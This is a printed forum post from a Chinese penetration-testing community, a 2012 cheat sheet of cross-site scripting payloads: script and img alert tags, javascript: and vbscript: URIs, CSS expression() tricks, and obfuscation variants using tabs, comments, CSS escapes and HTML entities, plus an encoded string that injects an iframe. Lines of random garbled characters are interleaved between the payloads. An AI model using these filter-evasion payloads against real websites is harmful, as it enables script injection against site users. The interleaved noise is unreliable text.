中国网络渗透测试联盟
标题:
xss
[打印本页]
作者:
admin
时间:
2012-9-15 14:09
标题:
xss
<script>alert("跨站")</script> (最常用)
3 l5 s0 |; h4 D% P/ S8 U
<img scr=javascript:alert("跨站")></img>
2 t- L e f, k
<img scr="javascript: alert(/跨站/)></img>
1 }7 n5 Y: {* d u+ ?
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
; H' a, y+ K) ~& I
<img scr="#" onerror=alert(/跨站/)></img>
% l3 e( k7 F. \# ~/ [
<img scr="#" style="xss:expression(alert(/xss/));"></img>
0 [: N; o5 a0 m3 Q! d- S: {* ^
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
: t: o5 ?9 n* g. F3 T) S
<img src=vbscript:msgbox ("xss")></img>
! h; u: E4 v2 ~* Z: q
<style> input {left:expression (alert('xss'))}</style>
- E7 x+ F' S) R: U% r/ N
<div style={left:expression (alert('xss'))}></div>
' P$ u: C3 J1 E6 r0 M% F
<div style={left:exp/* */ression (alert('xss'))}></div>
! X: P; M" a+ b) P
<div style={left:\0065\0078ression (alert('xss'))}></div>
' o q3 X; y6 N% D9 q$ S2 w: @; @" x, J
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
2 Q( j* n# s: N8 ?9 d$ Z- j9 {
unicode <div style="{left:expRessioN (alert('xss'))}">
; h7 Y3 \3 |" N, U8 l; X3 b1 r
% T4 ?" R0 {7 s I* D) v2 _
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
+ P$ T* P5 `/ X, m& Y- F) z; U% s5 n
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2